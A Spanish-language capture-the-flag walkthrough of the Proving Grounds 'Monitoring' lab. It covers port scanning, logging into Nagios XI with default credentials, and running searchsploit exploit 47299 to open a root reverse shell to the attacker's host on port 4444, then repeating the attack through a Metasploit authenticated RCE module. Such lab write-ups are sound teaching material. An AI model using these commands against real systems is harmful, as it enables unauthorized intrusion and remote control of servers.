🟢Monitoring
Write-up de la máquina Monitoring de Proving Grounds #writeup #walkthrough

Enumeración
NMAP
Comenzamos como siempre enumerando de forma rápida los servicios que tiene abiertos el objetivo.
nmap -p- -vvv --open --min-rate 2000 -Pn -n 192.168.76.136

Están abiertos los puertos 22, 25, 80, 389, 443 y 5667. El siguiente paso será el escaneo profundo de estos servicios abiertos.
-nmap -p22,25,80,389,443,5667 -Pn -n -sVC 192.168.76.136

Existen 6 puertos abiertos en el equipo target.
Puerto 22 -> SSH -> OpenSSH 7.2
Puerto 25 -> SMTP -> Postfix
Puerto 80 -> HTTP -> Apache httpd 2.4.18
Puerto 389 -> LDAP -> OpenLDAP 2.2.X - 2.3.X
Puerto 443 -> HTTPS -> Apache httpd 2.4.18
Puerto 5667 -> ?
Además de una versión que puede ser interesante más adelante, Nagios XI.
Enumeración Web
Tenemos abiertos los puertos 80 y 443, así que comenzamos viendo el contenido.

Se está ejecutando un servicio Nagios XI en el puerto 80. Revisando el código fuente no encontramos nada interesante. Pulsamos en "Acess Nagios XI" y se nos redirige a un inicio de sesión.

Probaremos algunas credenciales por defecto comunes admin:admin, admin:password... pero no obtenemos acceso. Vamos a buscar en Google las credenciales de inicio de sesión por defecto para Nagios y encontramos que el username por defecto es "nagiosadmin" y vamos a probar "admin" como contraseña. Tenemos credenciales para iniciar sesión en Nagios XI, "nagiosadmin:admin".

Vamos a enumerar los directorios disponibles, para lo cual utilizaremos dirsearch.
dirsearch -u "http://192.168.76.136" -i200,301

No hay anda interesante.
Vamos a buscar vulnerabilidades para Nagios XI. Utilizaremos searchsploit.
Sabemos que la versión de Nagios es la 5.6.0


Explotación
Explotación manual
Descargamos el exploit para ver si se adapta a nuestras necesidades.
searchsploit -m 47299.php
Vemos como debemos ejecutarlo.

Nota: Debemos instalar "php dom"
sudo apt-get install php-dom
Una vez instalado "php dom" ejecutamos el exploit como se indicaba anteriormente y por otro lado, colocaremos un oyente nc en el puerto 4444.
php 47299.php --host=192.168.76.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.76 --reverseport=4444


Ya tenemos conexión con la máquina objetivo, además de privilegios máximos. Vamos a buscar en este caso la única flag existente, proof.txt.

Ya tendríamos la máquina acabada.
Explotación vía Metasploit
Una vez hemos realizado la exploit vía "manual", vamos a realizar la vulneración utilizando Metasploit. Vamos a ello.
use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
Configuramos el exploit.

Y ejecutamos.

Y ya volveriamos a tener conexión con la máquina objetivo. Solo quedaría volver a buscar la flag proof.txt.

Y tendríamos acabada la máquina, esta vez de manera automatiza utilizando un exploit de la herramienta Metasploit.
Last updated
Was this helpful?